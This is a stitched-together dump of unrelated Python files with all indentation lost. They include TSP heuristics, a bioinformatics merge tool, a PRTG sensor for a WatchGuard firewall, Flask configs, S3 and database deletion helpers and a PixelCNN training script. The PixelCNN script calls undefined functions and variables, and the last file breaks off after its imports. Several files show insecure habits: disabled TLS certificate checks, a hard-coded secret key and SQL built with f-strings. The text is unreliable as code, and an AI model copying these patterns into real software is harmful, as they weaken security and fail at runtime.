return [2 * G.distNodes(G.nodes[0].ID, G.nodes[1].ID, latlong), G.nodes]
path = [list.pop()]
while (list):
m = len(list)
Nearest = 0
MinDist = G.distNodes(path[-1].ID, list[0].ID, latlong)
for k in range (m):
dist = G.distNodes(path[-1].ID, list[k].ID, latlong)
if (dist < MinDist):
MinDist = dist
Nearest = k
path.append(list.pop(Nearest))
cost += MinDist
cost += G.distNodes(path[-1].ID, path[0].ID, latlong)
return [cost, path]
def H2opt(G, Hamilton, latlong = True):
def Swap2opt(path, k, l):
if (l == 0):
middle = path[k+2 :]
middle.reverse()
path = path[k+1] + path[1 : k+1] + path[0] + middle
return path
middle = path[k+1 : l+1]
middle.reverse()
path = path[: k+1] + middle + path[l+1 :]
return path
n = len(Hamilton)
z = 0
comp = 0
limit = 100
better = True
while (better) and (z < limit):
z += 1
better = False
for i in range (n):
for j in range(n):
if (j < i-1) or (j > i+1):
k = min(i, j)
l = max(i, j)
a = k
b = k+1
c = l
d = l+1
if (l == n-1):
d = 0
if (G.distNodes(Hamilton[a].ID, Hamilton[b].ID , latlong) + G.distNodes(Hamilton[c].ID, Hamilton[d].ID , latlong) > G.distNodes(Hamilton[a].ID, Hamilton[c].ID , latlong) + G.distNodes(Hamilton[b].ID, Hamilton[d].ID , latlong)):
Hamilton = Swap2opt(Hamilton, k, l)
better = True
comp +=1
cost = 0
for k in range (n-1):
cost += G.distNodes(Hamilton[k].ID, Hamilton[k+1].ID, latlong)
if (k == n-2):
cost += G.distNodes(Hamilton[k+1].ID, Hamilton[0].ID, latlong)
return [cost, Hamilton]
def Prim (G, latlong=True): #maybe optimize
def inp(y, P):
n = len(P)
for k in range (n):
if (y == P[k]):
return True
return False
def infto(x, y):
if (x == -1):
return False
if (y == -1):
return True
return (x < y)
def extracter(P, Key):
n = len(P)
indexmin = 0
min = Key[P[0]]
for i in range (n):
if (infto(Key[P[i]], min)):
min = Key[P[i]]
indexmin = i
ret = P[indexmin]
del P[indexmin]
return ret
n = len(G.nodes)
Key = [-1 for k in range (n)]
Father = [-1 for k in range (n)]
P = [k for k in range (n)]
Key[0] = 0
Father[0] = 0
while (P):
x = extracter(P, Key)
for y in range (n):
if (y != x) and inp(y, P) and infto(G.distNodes(x, y, latlong), Key[y]):
Key[y] = G.distNodes(x, y, latlong)
Father[y] = x
return Father
def Christofides(G, latlong = True):
n = len(G.nodes)
#ACM obtained with Prim algorithm
tree = Prim(G, latlong)
#deg of the tree
deg = [1 for k in range (n)]
deg[0] = -1
for k in range (n):
deg[tree[k]] += 1
#print (deg)
## Tests
if __name__ == '__main__':
Rand = Graph("rand")
Rand.buildRandomGraph(100)
def TestBrutal():
c = Brutal(Rand, False)
Rand.hamilton = c[1]
Rand.show(False)
def TestInser():
c = Inser(Rand, False)
Rand.hamilton = c[1]
Rand.show(False)
def TestNearest():
c = Nearest(Rand, False)
Rand.hamilton = c[1]
Rand.show(False)
def Test2opt():
c = H2opt(Rand, Inser(Rand, False)[1], False)
Rand.hamilton = c[1]
Rand.show(False)
def plotPrim(G):
tree = Prim(G, False)
n = len(tree)
def Correcter(position):
"""swap the latitude and the longitude"""
X = position[1]
Y = position[0]
return [X,Y]
def DrawBranch(node1,node2, color, width):
"""draw a branch of the tree"""
if (node1.ID != node2.ID):
coordstart = Correcter(node1.position)
coordstop = Correcter(node2.position)
plt.plot([coordstart[0],coordstop[0]], [coordstart[1],coordstop[1]], linewidth = width, color=color)
for k in range (n):
DrawBranch(G.nodes[tree[k]], G.nodes[k], color='red', width=1)
plt.show()
def TestPrim():
plotPrim(Rand)
Christofides(Rand, False)
def PerfGraphics(nbrNodes, nbtest = 100):
"""Calculates the average time of calculation of the hamilton path and it's length and draws curves.
It will test graphs from one node to nbrNodes nodes.
For each number of node the test his repeated nbtest times to obtain an average."""
Nodes = []
#Brutal
ATbrutal = []
ADbrutal = []
#Inser
ATinser = []
ADinser = []
#Nearest
ATnearest = []
ADnearest = []
#2opt
AT2opt = []
AD2opt = []
#2opt + Inser
AT2optI = []
AD2optI = []
#2opt + Nearest
AT2optN = []
AD2optN = []
for n in range (2, nbrNodes+1):
Nodes.append(n)
print(n)
# Average Time and Average Distance for every algorithms
tbrutal = 0
dbrutal = 0
tinser = 0
dinser = 0
tnearest = 0
dnearest = 0
t2opt = 0
d2opt = 0
t2optI = 0
d2optI = 0
t2optN = 0
d2optN = 0
for k in range (nbtest):
Rand = Graph("rand")
Rand.buildRandomGraph(n)
#Brutal
if (n < 8): #too long
av = time()
brutal = Brutal(Rand, False)
ap = time()
tbrutal += ap-av
dbrutal += brutal[0]
#Inser
av = time()
inser = Inser(Rand, False)
ap = time()
tinser += ap-av
dinser += inser[0]
#Nearest
av = time()
nearest = Nearest(Rand, False)
ap = time()
tnearest += ap-av
dnearest += nearest[0]
#2opt
av = time()
h2opt = H2opt(Rand, Rand.nodes, False)
ap = time()
t2opt += ap-av
d2opt += h2opt[0]
#2opt + Inser
av = time()
h2optI = H2opt(Rand, Inser(Rand, False)[1], False)
ap = time()
t2optI += ap-av
d2optI += h2optI[0]
#2opt + Nearest
av = time()
h2optN = H2opt(Rand, Nearest(Rand, False)[1], False)
ap = time()
t2optN += ap-av
d2optN += h2optN[0]
#Brutal
if (n < 8):
ATbrutal.append(tbrutal/nbtest)
ADbrutal.append(dbrutal/nbtest)
#Inser
ATinser.append(tinser/nbtest)
ADinser.append(dinser/nbtest)
#Nearest
ATnearest.append(tnearest/nbtest)
ADnearest.append(dnearest/nbtest)
#2opt
AT2opt.append(t2opt/nbtest)
AD2opt.append(d2opt/nbtest)
#2opt + Inser
AT2optI.append(t2optI/nbtest)
AD2optI.append(d2optI/nbtest)
#2opt + Nearest
AT2optN.append(t2optN/nbtest)
AD2optN.append(d2optN/nbtest)
plt.subplot(211)
plt.yscale('log')
plt.plot(Nodes[: len(ATbrutal)], ATbrutal, label='Brutal')
plt.plot(Nodes,ATinser, label='Inser')
plt.plot(Nodes,ATnearest, label='Nearest')
plt.plot(Nodes,AT2opt, label='2opt')
plt.plot(Nodes,AT2optI, label='2opt + Inser')
plt.plot(Nodes,AT2optN, label='2opt + Nearest')
plt.xlabel('Number of Nodes')
plt.ylabel('Time (in seconds)')
plt.legend()
plt.title('Average time to find an hamilton path for each algorithm')
plt.subplot(212)
plt.plot(Nodes[: len(ADbrutal)], ADbrutal, label='Brutal')
plt.plot(Nodes,ADinser, label='Inser')
plt.plot(Nodes,ADnearest, label='Nearest')
plt.plot(Nodes,AD2opt, label='2opt')
plt.plot(Nodes,AD2optI, label='2opt + Inser')
plt.plot(Nodes,AD2optN, label='2opt + Nearest')
plt.xlabel('Number of Nodes')
plt.ylabel('Length (in meters)')
plt.legend()
plt.title('Average length of an hamilton path for each algorithm')
plt.savefig("Graphique de performance : (" + str(nbrNodes) + ", " + str(nbtest) + ")")
plt.show()
def TestsHamilton():
#TestBrutal()
#TestInser()
#TestNearest()
#Test2opt()
TestPrim()
#PerfGraphics(50,1000) #extremely long if the values are over (60,10)
c = 1
TestsHamilton() |
#!/usr/bin/env python
import os
import sys
import json
from argparse import ArgumentParser
from mglib import merge_biom, AUTH_LIST, VERSION, safe_print
prehelp = """
NAME
mg-tab-merge
VERSION
%s
SYNOPSIS
mg-biom-merge [ --help --retain_dup_ids ] biom1 biom2 [ biom3 biom4 ... ]
DESCRIPTION
Tool to merge two or more profiles in tab format (output from mg-biom2tag)
"""
posthelp = """
Input
Two or more profile files in tab format
Output
Merged tab to stdout
EXAMPLES
mg-tab-merge --help
SEE ALSO
-
AUTHORS
%s
"""
def main(args):
ArgumentParser.format_description = lambda self, formatter: self.description
ArgumentParser.format_epilog = lambda self, formatter: self.epilog
parser = ArgumentParser(usage='', description=prehelp%VERSION, epilog=posthelp%AUTH_LIST)
parser.add_argument('profiles', metavar='N', type=str, nargs='+',
help='list of profiles in json')
parser.add_argument("--level", dest="level", type=int , default=3 , choices=[1,2,3,4] , help="print up to level")
parser.add_argument("--evalue", dest="evalue", type=int , default=0 , help="filter rows for < evalue")
parser.add_argument("--percent-identity", dest="percent_identity", type=float , default=0 , help="filter rows > percent identity")
parser.add_argument("--retain_dup_ids", dest="retain_dups", action="store_true", default=False, help="append input number to duplicate input ID's rather than discarding duplicates, default is false")
# get inputs
opts = parser.parse_args()
if len(args) < 2:
sys.stderr.write("ERROR: must have at least 2 file inputs\n")
return 1
for f in opts.profiles :
if not os.path.isfile(f):
sys.stderr.write("ERROR: %s is not a valid file\n")
return 1
init_row = [0 for x in range( len(opts.profiles) )]
header = []
subsystem2abundance = {}
column = 0
if opts.evalue > 0 :
opts.evalue = opts.evalue * (-1)
level = opts.level
for profile in opts.profiles :
header.append(profile)
with open(profile, 'r') as p :
for line in p :
row = line.strip().split("\t")
# get subsystem levels - not generic
levels = row[5:9]
if float(row[2]) > opts.evalue :
continue
if float(row[3]) < opts.percent_identity :
continue
if levels[0] not in subsystem2abundance :
subsystem2abundance[levels[0]] = {}
if levels[1] not in subsystem2abundance[levels[0]] :
subsystem2abundance[levels[0]][levels[1]] = {}
if levels[2] not in subsystem2abundance[levels[0]][levels[1]] :
subsystem2abundance[levels[0]][levels[1]][levels[2]] = {}
if levels[3] not in subsystem2abundance[levels[0]][levels[1]][levels[2]] :
subsystem2abundance[levels[0]][levels[1]][levels[2]][levels[3]] = [0 for x in range( len(opts.profiles) )]
subsystem2abundance[levels[0]][levels[1]][levels[2]][levels[3]][column] += int(row[1])
column += 1
# print
i = 0
ss_header = [str(x + 1) for x in range(level)]
print( "\t".join( ss_header + header))
for l1 in subsystem2abundance :
l1_abundances = [0 for x in range( len(opts.profiles) )]
for l2 in subsystem2abundance[l1] :
l2_abundances = [0 for x in range( len(opts.profiles) )]
for l3 in subsystem2abundance[l1][l2] :
l3_abundances = [0 for x in range( len(opts.profiles) )]
for l4 in subsystem2abundance[l1][l2][l3] :
if level == 4 :
print( "\t".join(
map(
lambda x : str(x),
[l1, l2, l3 , l4] + subsystem2abundance[l1][l2][l3][l4]
)
)
)
else :
for col , value in enumerate(subsystem2abundance[l1][l2][l3][l4]) :
l3_abundances[col] += value
# print up to level3
if level == 3 :
print( "\t".join(
map(
lambda x : str(x),
[l1, l2, l3] + l3_abundances
)
)
)
else :
for col , value in enumerate(l3_abundances) :
l2_abundances[col] += value
if level == 2 :
print( "\t".join(
map(
lambda x : str(x),
[l1, l2] + l2_abundances
)
)
)
else :
for col , value in enumerate(l2_abundances) :
l1_abundances[col] += value
if level == 1 :
print( "\t".join(
map(
lambda x : str(x),
[l1] + l1_abundances
)
)
)
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
import urllib
import http.cookiejar
import ssl
import xml.etree.ElementTree as ET
import json
import argparse
from paepy.ChannelDefinition import CustomSensorResult
parser = argparse.ArgumentParser()
parser.add_argument("prtg", help="PRTG String")
args = parser.parse_args()
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
cookiejar = http.cookiejar.CookieJar()
cookiejar.clear_session_cookies()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookiejar),
urllib.request.HTTPSHandler(context=context))
parameters = json.loads(args.prtg)
host = parameters.get('host')
user = parameters.get('linuxloginusername')
password = parameters.get('linuxloginpassword')
baseURL = 'https://' + host + ':8080'
url = baseURL + '/agent/login'
data = '<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>' + password + '</string></value></member><member><name>user</name><value><string>' + user + '</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>'
req = urllib.request.Request(url, data.encode('utf-8'))
response = opener.open(req)
xmlUserInformation = response.read()
root = ET.fromstring(xmlUserInformation)
sid = root[0][0][0][0][0][1].text
csrfToken = root[0][0][0][0][1][1].text
url = baseURL + '/auth/login'
values = [('username', user),
('password', password),
('domain', 'Firebox-DB'),
('sid', sid),
('privilege', 1),
('from_page', '/')]
data = urllib.parse.urlencode(values)
req = urllib.request.Request(url=url, data=data.encode('utf-8'))
response = opener.open(req)
url = baseURL + '/dashboard/dboard_get_interfaces?id=undefined'
req = urllib.request.Request(url)
response = opener.open(req)
# Parse JSON
interfaces = json.loads(response.read().decode('utf8'))
xmlList = interfaces.get('interface_list')
# Parse XML
list = ET.fromstring(xmlList)
if list.getchildren()[0].tag == 'cluster':
list = list.find('cluster').find('aggregate')
list_interfaces = list.find('network').find('interface_list')
list_interfaces = list.find('network').find('interface_list')
count_external_interfaces = 0
failed_interfaces = []
for interface in list_interfaces.getchildren():
if interface.find('enabled').text == '1' and interface.find('zone').text == 'External':
count_external_interfaces += 1
if interface.find('wan_target_status').text == '0':
failed_interfaces.append(interface.find('ifalias').text)
message = 'WAN Status: Error'
status = 2
if len(failed_interfaces) is 0:
message = 'OK'
status = 0
sensor = CustomSensorResult(message)
sensor.add_channel(channel_name="Status", unit="Count", value=status, is_limit_mode=True, limit_max_error=0.5,
limit_error_msg="At least one WAN is not available!", primary_channel=True)
sensor.add_channel(channel_name="Number of failed interfaces", unit="Count", value=len(failed_interfaces),
is_limit_mode=True, limit_max_error=0.5)
print(sensor.get_json_result())
|
# Robot Frameworkからインスタンス変数・クラス変数を扱うためには、ファイル名と同じにする必要がある
class variable_file_class:
class_val = 'python'
def __init__(self):
self.instance_val = 'self val'
instance_from_class = variable_file_class()
class diff_variable_file:
diff_class_val = 'diff class'
def __init__(self):
self.diff_instance_val = 'self diff val'
|
class Config(object):
DEBUG = False
TESTING = False
SECRET_KEY = "B\xb2?.\xdf\x9f\xa7m\xf8\x8a%,\xf7\xc4\xfa\x91"
MONGO_URI="mongodb://localhost:27017/test"
IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
SESSION_COOKIE_SECURE = False
class ProductionConfig(Config):
DEBUG = False
MONGO_URI="mongodb://localhost:27017/"
DB_NAME="test"
IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
SESSION_COOKIE_SECURE = True
class DevelopmentConfig(Config):
DEBUG = True
MONGO_URI="mongodb://localhost:27017/"
DB_NAME="test"
IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
SESSION_COOKIE_SECURE = False
class TestingConfig(Config):
TESTING = True
MONGO_URI="mongodb://localhost:27017/test"
IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
SESSION_COOKIE_SECURE = False |
import paho.mqtt.client as mqtt
import json
import time
broker_url = ""
broker_port = 1883
client = mqtt.Client()
client.connect(broker_url, broker_port)
image = [[1, 2, 3, 4], [2, 3, 4, 1], [3, 4, 1, 2], [4, 1, 2, 3]]
dictionary = {0: 10.3, 100: 40.5, 200: 51.2, 300: 91.2, 359: 2.0}
wheel_payload = json.dumps(image)
hq_payload = json.dumps(image[::-1])
lidar_payload = json.dumps(dictionary)
client.publish(topic="wheel_cam", payload=wheel_payload, qos=0, retain=False)
time.sleep(1)
client.publish(topic="hq_cam", payload=hq_payload, qos=0, retain=False)
time.sleep(1)
client.publish(topic="lidar", payload=lidar_payload, qos=0, retain=False)
|
import os.path
import shutil
def publish_api(output_dir):
if os.path.exists(output_dir):
shutil.rmtree(output_dir)
print("succeeded")
|
import os
from datetime import datetime, timedelta
import boto3
from app import db, bucket
from app.models import Event
def delete_user(u):
highlights=u.highlights.all()
topics = u.topics.all()
articles = u.articles.all()
tags = u.tags.all()
senders = u.approved_senders.all()
comms = u.comms
for h in highlights:
db.session.execute(f'DELETE from highlights_topics where highlight_id={h.id}')
db.session.execute(f'DELETE from tags_highlights where highlight_id={h.id}')
db.session.delete(h)
for t in topics:
db.session.execute(f'DELETE from highlights_topics where topic_id={t.id}')
db.session.execute(f'DELETE from tags_topics where topic_id={t.id}')
db.session.delete(t)
for t in tags:
db.session.execute(f'DELETE from tags_articles where tag_id={t.id}')
db.session.execute(f'DELETE from tags_highlights where tag_id={t.id}')
db.session.execute(f'DELETE from tags_topics where tag_id={t.id}')
db.session.delete(t)
for a in articles:
db.session.execute(f'DELETE from tags_articles where article_id={a.id}')
db.session.delete(a)
for s in senders:
db.session.delete(s)
db.session.delete(comms)
db.session.delete(u)
db.session.commit()
def check_for_delete():
print('Checking if anything needs deleting from Amazon.')
today = datetime.utcnow()
last_week = today - timedelta(days=8)
evs = Event.query.filter(Event.name == 'deleted account', Event.date <= last_week).all()
if evs:
for ev in evs:
if ev.user:
print(f'deleting files for user {ev.user.id}')
delete_az(ev.user)
else:
print('NoneType User')
else:
print('nothing needs deletion')
def delete_az(user):
if os.environ.get('DEV'):
az_path_base = f'staging/{user.id}/'
else:
az_path_base = f'{user.id}/'
az = boto3.resource('s3')
buck = az.Bucket(bucket)
buck.objects.filter(Prefix=az_path_base).delete()
|
import matplotlib.pyplot as plt
from fhir_parser import FHIR
fhir = FHIR()
patients = fhir.get_all_patients()
marital_status = {}
for patient in patients:
if str(patient.marital_status) in marital_status:
marital_status[str(patient.marital_status)] += 1
else:
marital_status[str(patient.marital_status)] = 1
plt.bar(range(len(marital_status)), list(marital_status.values()), align='center')
plt.xticks(range(len(marital_status)), list(marital_status.keys()))
plt.show() |
import pytest
import respx
@pytest.fixture()
async def httpx_mock():
async with respx.mock(base_url='http://example.com') as _http_mock:
yield _http_mock
|
'''
PROG II - Segunda Avaliação -
Integrantes:
ADALINE NOGUEIRA FERNANDES FIRMO
THIAGO VINICIOS LIMA DE ARAUJO SOUSA
MATHEUS DA COSTA DA SILVA
Questão 02
'''
from typing import List
class Ticket:
def __init__(self, val: str):
self.number = int(val)
class OccurrencesCounter:
def __init__(self, tickets: List[Ticket]):
self.tickets = tickets
def count_occurrences(self):
occurrences = {}
for t in self.tickets:
try:
occurrences[str(t.number)] += 1
except KeyError:
occurrences[str(t.number)] = 1
return occurrences
def main():
while True:
true_tickets, people_present = list(map(int, input().split()))
if true_tickets == people_present == 0:
break
all_tickets = list(map(lambda v: Ticket(v), input().split()))
counter = OccurrencesCounter(all_tickets)
occurrences = counter.count_occurrences()
false_tickets = 0
for v in occurrences.values():
if v > 1:
false_tickets += 1
print(false_tickets)
if __name__ == '__main__':
main()
|
import uuid
from mixer.backend.django import mixer
__all__ = [
mixer,
]
def _random_user_name() -> str:
return str(uuid.uuid4())
def _random_email() -> str:
uuid_as_str = str(uuid.uuid4()).replace('-', '_')
return f'{uuid_as_str}@mail.com'
mixer.register('users.User', username=_random_user_name, email=_random_email)
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import sys
setup(
name='tabpy-server',
version='0.2',
description='Web server Tableau uses to run Python scripts.',
url='https://github.com/tableau/TabPy',
author='Tableau',
author_email='github@tableau.com',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Information Analysis",
],
packages=['tabpy_server',
'tabpy_server.common',
'tabpy_server.management',
'tabpy_server.psws',
'tabpy_server.static'],
package_data={'tabpy_server.static':['*.*'],
'tabpy_server':['startup.*','state.ini.template']},
license='MIT',
install_requires=[
'future',
'futures',
'requests',
'simplejson',
'Tornado-JSON',
'tornado',
'cloudpickle',
'decorator',
'python-dateutil',
'genson',
'jsonschema',
'tabpy_client',
'numpy'
]
)
|
import warnings
import numpy as np
import torch
import torch.nn.functional as F
import torchtuples as tt
def pad_col(input, val=0, where='end'):
"""Addes a column of `val` at the start of end of `input`."""
if len(input.shape) != 2:
raise ValueError(f"Only works for `phi` tensor that is 2-D.")
pad = torch.zeros_like(input[:, :1])
if val != 0:
pad = pad + val
if where == 'end':
return torch.cat([input, pad], dim=1)
elif where == 'start':
return torch.cat([pad, input], dim=1)
raise ValueError(f"Need `where` to be 'start' or 'end', got {where}")
def array_or_tensor(tensor, numpy, input):
warnings.warn('Use `torchtuples.utils.array_or_tensor` instead', DeprecationWarning)
return tt.utils.array_or_tensor(tensor, numpy, input)
def make_subgrid(grid, sub=1):
"""When calling `predict_surv` with sub != 1 this can help with
creating the duration index of the survival estimates.
E.g.
sub = 5
surv = model.predict_surv(test_input, sub=sub)
grid = model.make_subgrid(cuts, sub)
surv = pd.DataFrame(surv, index=grid)
"""
subgrid = tt.TupleTree(np.linspace(start, end, num=sub+1)[:-1]
for start, end in zip(grid[:-1], grid[1:]))
subgrid = subgrid.apply(lambda x: tt.TupleTree(x)).flatten() + (grid[-1],)
return subgrid
def log_softplus(input, threshold=-15.):
"""Equivalent to 'F.softplus(input).log()', but for 'input < threshold',
we return 'input', as this is approximately the same.
Arguments:
input {torch.tensor} -- Input tensor
Keyword Arguments:
threshold {float} -- Treshold for when to just return input (default: {-15.})
Returns:
torch.tensor -- return log(softplus(input)).
"""
output = input.clone()
above = input >= threshold
output[above] = F.softplus(input[above]).log()
return output
def cumsum_reverse(input: torch.Tensor, dim: int = 1) -> torch.Tensor:
if dim != 1:
raise NotImplementedError
input = input.sum(1, keepdim=True) - pad_col(input, where='start').cumsum(1)
return input[:, :-1]
|
"""Script to train pixelCNN on the CIFAR10 dataset."""
import random as rn
import time
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from tensorflow import keras
class MaskedConv2D(keras.layers.Layer):
"""Convolutional layers with masks.
Convolutional layers with simple implementation of masks type A and B for
autoregressive models.
Arguments:
mask_type: one of `"A"` or `"B".`
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
"""
def __init__(self,
mask_type,
filters,
kernel_size,
strides=1,
padding='same',
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
input_n_channels=3):
super(MaskedConv2D, self).__init__()
assert mask_type in {'A', 'B'}
self.mask_type = mask_type
self.filters = filters
self.kernel_size = kernel_size
self.strides = strides
self.padding = padding.upper()
self.kernel_initializer = keras.initializers.get(kernel_initializer)
self.bias_initializer = keras.initializers.get(bias_initializer)
self.input_n_channels = input_n_channels
def build(self, input_shape):
self.kernel = self.add_weight("kernel",
shape=(self.kernel_size,
self.kernel_size,
int(input_shape[-1]),
self.filters),
initializer=self.kernel_initializer,
trainable=True)
self.bias = self.add_weight("bias",
shape=(self.filters,),
initializer=self.bias_initializer,
trainable=True)
center = self.kernel_size // 2
mask = np.ones(self.kernel.shape, dtype=np.float32)
mask[center, center + 1:, :, :] = 0
mask[center + 1:, :, :, :] = 0
for i in range(self.input_n_channels):
for j in range(self.input_n_channels):
if (self.mask_type == 'A' and i >= j) or (self.mask_type == 'B' and i > j):
mask[center, center, i::self.input_n_channels, j::self.input_n_channels] = 0
self.mask = tf.constant(mask, dtype=tf.float32, name='mask')
def call(self, input):
masked_kernel = tf.math.multiply(self.mask, self.kernel)
x = tf.nn.conv2d(input,
masked_kernel,
strides=[1, self.strides, self.strides, 1],
padding=self.padding)
x = tf.nn.bias_add(x, self.bias)
return x
class ResidualBlock(keras.Model):
"""Residual blocks that compose pixelCNN
Blocks of layers with 3 convolutional layers and one residual connection.
Based on Figure 5 from [1] where h indicates number of filters.
Refs:
[1] - Oord, A. V. D., Kalchbrenner, N., & Kavukcuoglu, K. (2016). Pixel recurrent
neural networks. arXiv preprint arXiv:1601.06759.
"""
def __init__(self, h):
super(ResidualBlock, self).__init__(name='')
self.conv2a = MaskedConv2D(mask_type='B', filters=h//2, kernel_size=1, strides=1)
self.conv2b = MaskedConv2D(mask_type='B', filters=h//2, kernel_size=7, strides=1)
self.conv2c = MaskedConv2D(mask_type='B', filters=h, kernel_size=1, strides=1)
def call(self, input_tensor):
x = tf.nn.relu(input_tensor)
x = self.conv2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = tf.nn.relu(x)
x = self.conv2c(x)
x += input_tensor
return x
def quantise(images, q_levels):
"""Quantise image into q levels."""
return (np.digitize(images, np.arange(q_levels) / q_levels) - 1).astype('float32')
def main():
# ------------------------------------------------------------------------------------
# Defining random seeds
random_seed = 42
tf.random.set_seed(random_seed)
np.random.seed(random_seed)
rn.seed(random_seed)
# ------------------------------------------------------------------------------------
# Loading data
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
height = 32
width = 32
n_channel = 3
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = x_train.reshape(x_train.shape[0], height, width, n_channel)
x_test = x_test.reshape(x_test.shape[0], height, width, n_channel)
# --------------------------------------------------------------------------------------------------------------
# Quantisize the input data in q levels
q_levels = 8
x_train_quantised_of = quantisize(x_train_overfit, q_levels)
x_test_quantised_of = quantisize(x_test_overfit, q_levels)
# ------------------------------------------------------------------------------------
# Creating input stream using tf.data API
batch_size = 128
train_buf = 60000
train_dataset = tf.data.Dataset.from_tensor_slices(
(x_train_quantised / (q_levels - 1),
x_train_quantised.astype('int32')))
train_dataset = train_dataset.shuffle(buffer_size=train_buf)
train_dataset = train_dataset.batch(batch_size)
test_dataset = tf.data.Dataset.from_tensor_slices((x_test_quantised / (q_levels - 1),
x_test_quantised.astype('int32')))
test_dataset = test_dataset.batch(batch_size)
# --------------------------------------------------------------------------------------------------------------
# Create PixelCNN model
n_filters = 120
inputs = keras.layers.Input(shape=(height, width, n_channel))
x = MaskedConv2D(mask_type='A', filters=n_filters, kernel_size=7)(inputs)
for i in range(15):
x = keras.layers.Activation(activation='relu')(x)
x = ResidualBlock(h=n_filters)(x)
x = keras.layers.Activation(activation='relu')(x)
x = MaskedConv2D(mask_type='B', filters=n_filters, kernel_size=1)(x)
x = keras.layers.Activation(activation='relu')(x)
x = MaskedConv2D(mask_type='B', filters=n_channel * q_levels, kernel_size=1)(x) # shape [N,H,W,DC]
pixelcnn = tf.keras.Model(inputs=inputs, outputs=x)
# --------------------------------------------------------------------------------------------------------------
# Prepare optimizer and loss function
lr_decay = 0.9999
learning_rate = 5e-3 #5
optimizer = tf.keras.optimizers.Adam(lr=learning_rate)
compute_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)
# --------------------------------------------------------------------------------------------------------------
@tf.function
def train_step(batch_x, batch_y):
with tf.GradientTape() as ae_tape:
logits = pixelcnn(batch_x, training=True)
logits = tf.reshape(logits, [-1, height, width, q_levels, n_channel])
logits = tf.transpose(logits, perm=[0, 1, 2, 4, 3])
loss = compute_loss(tf.one_hot(batch_y, q_levels), logits)
gradients = ae_tape.gradient(loss, pixelcnn.trainable_variables)
gradients, _ = tf.clip_by_global_norm(gradients, 1.0)
optimizer.apply_gradients(zip(gradients, pixelcnn.trainable_variables))
return loss
# ------------------------------------------------------------------------------------
# Training loop
n_epochs = 20
n_iter = int(np.ceil(x_train_quantised.shape[0] / batch_size))
for epoch in range(n_epochs):
progbar = Progbar(n_iter)
print('Epoch {:}/{:}'.format(epoch + 1, n_epochs))
for i_iter, (batch_x, batch_y) in enumerate(train_dataset):
optimizer.lr = optimizer.lr * lr_decay
loss = train_step(batch_x, batch_y)
progbar.add(1, values=[('loss', loss)])
# ------------------------------------------------------------------------------------
# Test set performance
test_loss = []
for batch_x, batch_y in test_dataset:
logits = pixelcnn(batch_x, training=False)
# Calculate cross-entropy (= negative log-likelihood)
loss = compute_loss(tf.squeeze(tf.one_hot(batch_y, q_levels)), logits)
test_loss.append(loss)
print('nll : {:} nats'.format(np.array(test_loss).mean()))
print('bits/dim : {:}'.format(np.array(test_loss).mean() / np.log(2)))
# ------------------------------------------------------------------------------------
# Generating new images
samples = np.zeros((100, height, width, n_channel), dtype='float32')
for i in range(height):
for j in range(width):
logits = pixelcnn(samples)
next_sample = tf.random.categorical(logits[:, i, j, :], 1)
samples[:, i, j, 0] = (next_sample.numpy() / (q_levels - 1))[:, 0]
fig = plt.figure(figsize=(10, 10))
for i in range(100):
ax = fig.add_subplot(10, 10, i + 1)
ax.matshow(samples[i, :, :, 0], cmap=matplotlib.cm.binary)
plt.xticks(np.array([]))
plt.yticks(np.array([]))
plt.show()
# ------------------------------------------------------------------------------------
# Filling occluded images
occlude_start_row = 16
num_generated_images = 10
samples = np.copy(x_test_quantised[0:num_generated_images, :, :, :])
samples = samples / (q_levels - 1)
samples[:, occlude_start_row:, :, :] = 0
fig = plt.figure(figsize=(10, 10))
for i in range(10):
ax = fig.add_subplot(1, 10, i + 1)
ax.matshow(samples[i, :, :, 0], cmap=matplotlib.cm.binary)
plt.xticks(np.array([]))
plt.yticks(np.array([]))
for i in range(occlude_start_row, height):
for j in range(width):
for k in range(n_channel):
logits = pixelcnn(samples)
logits = tf.reshape(logits, [-1, height, width, q_levels, n_channel])
logits = tf.transpose(logits, perm=[0, 1, 2, 4, 3])
next_sample = tf.random.categorical(logits[:, i, j, k, :], 1)
samples[:, i, j, k] = (next_sample.numpy() / (q_levels - 1))[:, 0]
fig = plt.figure(figsize=(10, 10))
for i in range(10):
ax = fig.add_subplot(1, 10, i + 1)
ax.matshow(samples[i, :, :, 0], cmap=matplotlib.cm.binary)
plt.xticks(np.array([]))
plt.yticks(np.array([]))
plt.show()
if __name__ == '__main__':
main()
|
import sys
from app import create_app, create_manager
sys.path.insert(0, "/root/flask-hellogit")
# 选择配置模式
app = create_app('development')
manager = create_manager(app)
if __name__ == "__main__":
manager.run()
|
import argparse
from functools import partial
from os.path import join
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch_optimizer import RAdam
from utils import collate_fn, build_vocab
